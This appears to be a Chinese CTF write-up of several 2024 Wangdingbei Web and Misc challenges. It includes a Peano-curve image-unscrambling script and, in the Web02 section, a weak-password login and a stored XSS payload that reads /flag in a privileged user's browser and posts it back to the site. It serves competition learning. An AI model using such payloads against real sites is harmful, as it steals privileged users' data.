2024网鼎杯青龙组Web+Misc部分WP

MISC01

发现人员的定位信息存在泄露,请对其进行分析。flag为用户位置信息进行32位md5哈希值

我们在这里可以找到关于Location------information信息

尝试把val值继续32位md5哈希加密,拿到flag

flag{4c4e66ea9aa659b1cac5d4fe327bbfc1}

MISC03

第 1 步:看到好几个上传木马的 ip,都试一试,最终 ip 为 39.168.5.60 的为

正确攻击 ip

MISC04

推测应该是按着曲线的轨迹将像素还原到原来的位置

脚本如下:

python 复制代码
from PIL import Image
from tqdm import tqdm

def peano(n):
    if n == 0:
        return [[0,0]]
    else:
        in_lst = peano(n - 1)
        lst = in_lst.copy()
        px,py = lst[-1]
        lst.extend([px - i[0], py + 1 + i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px + i[0], py + 1 + i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px + 1 + i[0], py - i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px - i[0], py - 1 - i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px + i[0], py - 1 - i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px + 1 + i[0], py + i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px - i[0], py + 1 + i[1]] for i in in_lst)
        px,py = lst[-1]
        lst.extend([px + i[0], py + 1 + i[1]] for i in in_lst)
        return lst

order = peano(6)

img = Image.open(r"C:\Users\ASUSROG\Desktop\chal.png")

width, height = img.size

block_width = width # // 3
block_height = height # // 3

new_image = Image.new("RGB", (width, height))

for i, (x, y) in tqdm(enumerate(order)):
    # 根据列表顺序获取新的坐标
    new_x, new_y = i % width, i // width
    # 获取原图像素
    pixel = img.getpixel((x, height - 1 - y))
    # 在新图像中放置像素
    new_image.putpixel((new_x, new_y), pixel)

new_image.save("rearranged_image.jpg") 

拿到二维码,扫描拿到flag

参考:IrisCTF2024 | 1r0ny

WEB02(环境关了没图片呜呜呜)

第 1 步:打开网页,目录扫描扫描到/flag,尝试访问,提示只有 boos 可以访

问。

第 2 步:尝试登录,admin/1,登录成功。

第 3 步:

复制代码
<script>fetch('/flag').then(response=>response.text()).then(data=>{fetch('/content/a9571d0
e889a28847d8682903',{method:'POST',headers:{'Content-Type':'application/x-www-form- 
urlencoded'},body:"content="+data});})</script>

更新之后提交给 boos,刷新页面拿到 flag

相关推荐
Lee川1 小时前
从零解剖一个 AI Agent Tool是如何实现的
前端·人工智能·后端
Aurorar0rua1 小时前
CS50 x 2024 Notes C -14
c语言·开发语言·学习方法
wangruofeng2 小时前
Playwright 深度调研:为什么它成了浏览器自动化的新底座
前端·测试
小短腿的代码世界2 小时前
从.qrc到rcc编译器:Qt资源系统的隐秘运作机制与大型项目性能突围
开发语言·qt
MY_TEUCK2 小时前
【2026最新Python+AI学习基础】Python 入门笔记篇
笔记·python·学习
2401_833269302 小时前
Java网络编程入门
java·开发语言
青瓦梦滋3 小时前
C++的IO流与STL的空间配置器
开发语言·c++
赢乐3 小时前
大模型学习笔记:检索增强生成(RAG)架构
人工智能·python·深度学习·机器学习·智能体·幻觉·检索增强生成(rag)
五月君_3 小时前
Bun v1.3.14 发布,Rust 版即将进 Claude Code 内测,下一版可能就告别 Zig
开发语言·后端·rust
李白的天不白4 小时前
SSR服务端渲染
前端